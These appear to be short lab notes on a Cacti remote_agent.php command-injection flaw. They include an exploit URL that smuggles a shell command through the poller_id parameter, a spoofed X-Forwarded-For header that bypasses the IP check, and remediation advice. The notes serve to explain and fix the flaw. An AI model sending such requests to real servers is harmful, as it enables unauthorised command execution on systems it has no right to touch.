CVE-2022-56169

sudo -i
admin

cd /var/www/html/cacti

nano /var/www/html/cacti/remote_agent.php

nano /var/www/html/cacti/lib/html_utility.php

mysql cacti

mysql> SELECT * FROM poller;

nano /var/www/html/cacti/lib/functions.php

The REMOTE_ADDR variable is set to the source IP address from the connection.

Variables beginning with HTTP_ are populated by the corresponding HTTP headers received from the client.

http://cacti-server-ip/cacti/remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=touch /tmp/hello.txt

'X-Forwarded-For': '127.0.0.1'

By allowing the administrator to configure which HTTP proxy headers should be honored when determining the IP address of a client. Only the REMOTE_ADDR server variable should be used by default, ensuring a secure default configuration.

The function get_nfilter_request_var() should be replaced with get_filter_request_var() to ensure that the $poller_id parameter is an integer.

Furthermore, values should always be escaped before being passed to sensitive functions like proc_open.

GitHub Link